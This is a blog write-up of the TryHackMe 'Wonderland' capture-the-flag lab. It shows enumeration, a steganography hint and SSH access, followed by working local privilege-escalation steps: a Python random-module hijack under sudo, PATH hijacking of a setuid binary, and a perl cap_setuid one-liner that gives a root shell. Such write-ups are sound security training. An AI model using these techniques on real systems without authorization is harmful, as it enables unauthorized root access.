--- title: "TryHackMe: Wonderland" pubDatetime: 2020-06-05T23:24:43.000Z tags: ["tryhackme", "writeup"] description: "New week, new challenge. This is my writeup of the Wonderland machine." --- # Info ![](/images/size/w1000/2020/07/image-15.png) **Name**: Wonderland **Difficulty**: Medium **Released**: Fri 05 Jun 2020 **Creator**: NinjaJc01 **URL**: [https://tryhackme.com/room/wonderland](https://tryhackme.com/room/wonderland) # Enumeration As always we start with a nmap scan of the machine: ```bash nmap -sC -sV -oA nmap/all-tcp 10.10.167.35 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 23:56 CEST Nmap scan report for 10.10.167.35 Host is up (0.046s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA) | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA) |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Follow the white rabbit. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` We only have two ports open: 22 and 80. Visiting the web server reveals the following page: ![](/images/size/w1000/2020/06/follow_white_rabbit.png) We also do a directory scan with `ffuf` and find the following directories: ```bash ffuf -u http://10.10.167.35/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.1.0-git ________________________________________________ :: Method : GET :: URL : http://10.10.167.35/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403 ________________________________________________ img [Status: 301, Size: 0, Words: 1, Lines: 1] poem [Status: 301, Size: 0, Words: 1, Lines: 1] r [Status: 301, Size: 0, Words: 1, Lines: 1] :: Progress: [20473/20473] :: Job [1/1] :: 853 req/sec :: Duration: [0:00:24] :: Errors: 0 :: ``` After looking at the different directories I didn't find anything of interest, so I decided to download the first image we found and see if something was hidden in it. ```bash wget http://10.10.167.35/img/white_rabbit_1.jpg --2020-06-06 00:04:02-- http://10.10.167.35/img/white_rabbit_1.jpg Connecting to 10.10.167.35:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1993438 (1.9M) [image/jpeg] Saving to: ‘white_rabbit_1.jpg’ white_rabbit_1.jpg 100%[==============================================================>] 1.90M 4.57MB/s in 0.4s 2020-06-06 00:04:02 (4.57 MB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438] steghide extract -sf white_rabbit_1.jpg Enter passphrase: wrote extracted data to "hint.txt". s1gh@kali:~/TryHackMe/Wonderland/files$ cat hint.txt follow the r a b b i t ``` My immiediate thought was that `r a b b i t` was that this might be pointing to an URL: ![](/images/size/w1000/2020/06/rabbit.png) Looking at the source reveals something that looks like credentials: ![](/images/size/w1000/2020/06/creds.png) We can now use the credentials above and SSH into the box. # Initial Foothold We now have access to the machine, but by doing a `ls -la` we notice something something weird. The `root.txt` file is located in our users directory... ```bash ls -la total 40 drwxr-xr-x 5 alice alice 4096 May 25 17:52 . drwxr-xr-x 6 root root 4096 May 25 17:52 .. lrwxrwxrwx 1 root root 9 May 25 17:52 .bash_history -> /dev/null -rw-r--r-- 1 alice alice 220 May 25 02:36 .bash_logout -rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc drwx------ 2 alice alice 4096 May 25 16:37 .cache drwx------ 3 alice alice 4096 May 25 16:37 .gnupg drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local -rw-r--r-- 1 alice alice 807 May 25 02:36 .profile -rw------- 1 root root 66 May 25 17:08 root.txt -rw-r--r-- 1 root root 3577 May 25 02:43 walrus_and_the_carpenter.py ``` After a bit of thinkering (and looking at the hint) we try to `cat /root/user.txt`. ```bash cat /root/user.txt thm{FLAG-REDACTED} ``` We finally have the user flag! Now, let's priv esc to root. # Privilege Escalation Looking at our privileges with `sudo -l` reveals the following: ```bash sudo -l [sudo] password for alice: Matching Defaults entries for alice on wonderland: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py ``` We can run `sudo /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py` as the user `rabbit`. Even though we only have read access to `walrus_and_the_carpenter.py` and can't edit the file, let's see what the file is doing when executed. ```python import random poem = """The sun was shining on the sea, Shining with all his might: He did his very best to make The billows smooth and bright — And this was odd, because it was The middle of the night. The moon was shining sulkily, Because she thought the sun Had got no business to be there After the day was done — "It’s very rude of him," she said, "To come and spoil the fun!" The sea was wet as wet could be, The sands were dry as dry. You could not see a cloud, because No cloud was in the sky: No birds were flying over head — There were no birds to fly. The Walrus and the Carpenter Were walking close at hand; They wept like anything to see Such quantities of sand: "If this were only cleared away," They said, "it would be grand!" [...] for i in range(10): line = random.choice(poem.split("\n")) ``` Do to the length of the file, I've removed some of the poem that's printed to the screen when we're executing the file. At the top of the file, we can see that the python module `random` is imported. So, what if we create a file named `random.py` in our current working directory that executes `/bin/bash`? That way our python file should be loaded instead of the "real" `random` module, and in turn give us a shell as the `rabbit` user. Our `random.py`: ```python import os os.system("/bin/bash") ``` Executing the python script: ```bash alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py rabbit@wonderland:~$ whoami rabbit ``` Awesome! We have escalated our privileges to the `rabbit` user. Looking in `/home/rabbit/` we find a setuid binary, and by examining the file we see that `date` is executed without specifying an absolute path: ```bash Welcome to the tea party! The Mad Hatter will be here soon. /bin/echo -n 'Probably by ' && date --date='next hour' -R Ask very nicely, and I will give you some tea while you wait for him Segmentation fault (core dumped) ``` We can abuse this by exporting our own $PATH, writing a small script called `date` and running the setuid binary. **Exporting our own $PATH**: ```bash rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH rabbit@wonderland:/home/rabbit$ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ``` Now, everytime a program is called without specifying an absolute path, our shell will first look in `/tmp`. **Creating our malicious date file** We now create a shell script called `date`, place that in `/tmp` and make it executable with `chmod +x /tmp/date`. ```bash rabbit@wonderland:/home/rabbit$ cat /tmp/date #!/bin/bash /bin/bash ``` All we now need to do is run the setuid binary and we should escalate to the user `hatter`. ```bash rabbit@wonderland:/home/rabbit$ ./teaParty Welcome to the tea party! The Mad Hatter will be here soon. Probably by hatter@wonderland:/home/rabbit$ hatter@wonderland:/home/rabbit$ whoami;id hatter uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit) ``` Awesome! We're getting close. Looking in the home directory of the user `hatter` reveals a password in cleartext. Trying to ssh in with this password gives us a full shell as the user `hatter`: ```bash ssh hatter@10.10.167.35 hatter@10.10.167.35's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri Jun 5 22:48:04 UTC 2020 System load: 0.07 Processes: 95 Usage of /: 19.4% of 19.56GB Users logged in: 1 Memory usage: 32% IP address for eth0: 10.10.167.35 Swap usage: 0% 0 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Fri Jun 5 22:47:57 2020 from 10.11.4.205 hatter@wonderland:~$ whoami;id hatter uid=1003(hatter) gid=1003(hatter) groups=1003(hatter) ``` Doing some basic enumeration reveals that `perl` have the following capability set: `cap_setuid+ep` ```bash hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null /usr/bin/perl5.26.1 = cap_setuid+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/perl = cap_setuid+ep ``` We can easily abuse this and escalate to root! ```bash hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' # whoami;id root uid=0(root) gid=1003(hatter) groups=1003(hatter) ``` We can now finally get the `root.txt` flag as well! ```bash # cat /home/alice/root.txt thm{FLAG-REDACTED} ``` ![](https://media1.tenor.com/images/7c34db41bb5a790a561f493923b3bb43/tenor.gif)